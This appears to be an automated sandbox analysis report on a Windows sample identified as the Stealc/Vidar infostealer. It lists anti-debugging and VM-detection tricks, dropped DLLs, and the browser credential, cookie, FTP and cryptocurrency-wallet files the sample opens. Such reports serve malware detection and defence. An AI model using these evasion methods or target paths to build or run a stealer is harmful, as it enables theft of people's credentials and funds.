Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C058 second address: C3C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B634 second address: C4B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B639 second address: C4B64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7D2 second address: C4B7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7DB second address: C4B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7E5 second address: C4B7ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7ED second address: C4B7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7F5 second address: C4B7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D418 second address: C4D421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D421 second address: C4D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D425 second address: C4D429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3CD second address: B2D3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3D1 second address: B2D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3DA second address: B2D3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FCFA second address: C4FCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEDD second address: C4FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEE8 second address: C4FEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFA9 second address: C4FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8FCD64876h 0x0000000a popad 0x0000000b jbe 00007FB8FCD64878h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FB8FCD6487Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jnl 00007FB8FCD64878h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB8FCD64883h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFEB second address: C4FFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C517E5 second address: C517E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C537CB second address: C537CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52902DC second address: 5290353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 00649B47h 0x00000008 pushfd 0x00000009 jmp 00007FB8FCD6487Ch 0x0000000e add cx, 59F8h 0x00000013 jmp 00007FB8FCD6487Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov cl, dl 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FB8FCD6487Dh 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov eax, 42B5F0B3h 0x0000002e jmp 00007FB8FCD64888h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB8FCD64887h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73182 second address: B7318C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7318C second address: B73193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73323 second address: B73327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A73 second address: 5290A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A79 second address: 5290A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A7D second address: 5290AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FB8FCD64880h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB8FCD64887h 0x00000017 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: 9C1943 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00774910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0076E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00773EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00773EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00774570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0076ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00761160 GetSystemInfo,ExitProcess,

0_2_00761160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EGDGIEGH.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: EGDGIEGH.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: EGDGIEGH.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1638110314.0000000001284000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: EGDGIEGH.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: EGDGIEGH.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: EGDGIEGH.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: EGDGIEGH.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: EGDGIEGH.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: EGDGIEGH.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBF5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CBF5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007645C0 VirtualProtect ?,00000004,00000100,00000000

0_2_007645C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779750 mov eax, dword ptr fs:[00000030h]

0_2_00779750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CBCB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CBCB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: :Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBCB341 cpuid

0_2_6CBCB341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00777B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00776920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00776920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00777A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.l

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
